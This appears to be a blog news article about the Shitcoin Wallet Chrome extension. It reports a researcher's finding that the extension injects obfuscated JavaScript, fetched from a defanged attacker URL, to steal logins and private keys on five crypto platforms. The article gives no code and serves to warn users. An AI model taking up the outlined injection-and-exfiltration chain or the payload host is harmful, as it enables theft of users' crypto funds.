There is a Chrome Extension Shitcoin Which Can Steal Your Crypto-Keys
The world of the Internet is vast and there are plenty of interesting tools and extensions. Some of these tools and extensions can be trusted, while a handful of these tools cannot be trusted.
Recently, we have come across a similar tool called the Shitcoin which was released on the 9th of December. This particular extension was initially designed to secure Ethereum coins and ERC20 digital tokens. For those of you who aren’t aware of these tokens, these tokens help with the ICO.
For now, Shitcoin is trending among users who are dealing with the Ethereum cryptocurrency. Apparently, these individuals aren’t quite aware of the fact that this particular wallet can put their private information at risk. The Shitcoin wallet uses a specific JavaScript code specifically designed to steal passwords and private keys of other users who are using the Shitcoin wallet to make crypto-transactions. The wallet simply injects the JS code into other people’s website pages and then track that information to the source. It then copies the information and then delivers it to the Shitcoin database. Users often install the chrome extension on their browsers and if they aren’t quite the fan of using Chrome, they instead install the Windows desktop app and manage funds outside the browser.
Sadly, the wallet app isn’t something that the organization’s CEO has promised the users that it will be. According to Harry Denley who is currently working as the Director of Security at the MyCrypto platform, the Ethereum wallet Shitcoin contains a malicious code which injects itself in different website unannounced. Denley also sheds light on the fact that the extension is harmful to people who rely on the wallet to secure any funds in the form of Ethereum coins or ERC20-based tokens.
Denley exposed a shocking reveal that the Shitcoin wallet is capable of sending private key information of all its wallets to a third-party website located at the following address: erc20wallet[.]tk.
At the same time, the extension also injects a JavaScript code in case, a user visits any of the five popular cryptocurrency management platforms. The code is specifically designed to extract credential information and extract private keys. Here’s how the malicious code inflicts damage to the users:
- Users install the Chrome extension
- Chrome extension requests permission to inject JavaScript (JS) code on 77 websites [listed here]
- When users navigate to any of these 77 sites, the extension loads and injects an additional JS file from https://erc20wallet[.]tk/js/content_.js
- This JS file contains obfuscated code [deobfuscated ]
- The code activates on five websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange
- Once activated, the malicious JS code records the user’s login credentials, searches for private keys stored inside the dashboards of the five services, and, finally, sends the data to erc20wallet[.]tk
There is no clarity yet whether this code on Shitcoin Wallet has been installed by the company itself or a third party, but one thing is for sure, this particular Chrome extension has been compromised.
It is best advised that a user should first scan the website using a tool such as VirusTotal.
Do you enjoy reading this informative piece? If you did then please do let us know what you think. We await your feedback.